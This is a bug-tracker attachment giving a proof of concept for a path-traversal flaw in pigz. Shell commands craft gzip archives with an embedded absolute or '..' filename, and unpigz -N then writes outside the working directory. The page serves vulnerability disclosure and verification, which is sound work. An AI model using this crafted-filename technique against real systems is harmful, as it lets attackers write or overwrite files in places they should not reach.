Attachment 7522 Details for Bug 17895 – PoC for pigz vunerability

PoC for pigz vunerability

pigz.poc (text/plain), 547 bytes, created by Len Lawrence on 2016-03-08 01:27:09 CET

(hide)

Description:

Filename:

MIME Type:

Creator: Len Lawrence

Created: 2016-03-08 01:27:09 CET

Size: 547 bytes

patch

obsolete

A sample could be prepared in following ways:
1) absolute path
$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
# unpigz == pigz -d
$ ls /tmp/abs
/tmp/abs

2) relative path with ".."
$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel

Actions: View

Attachments on bug 17895: 7522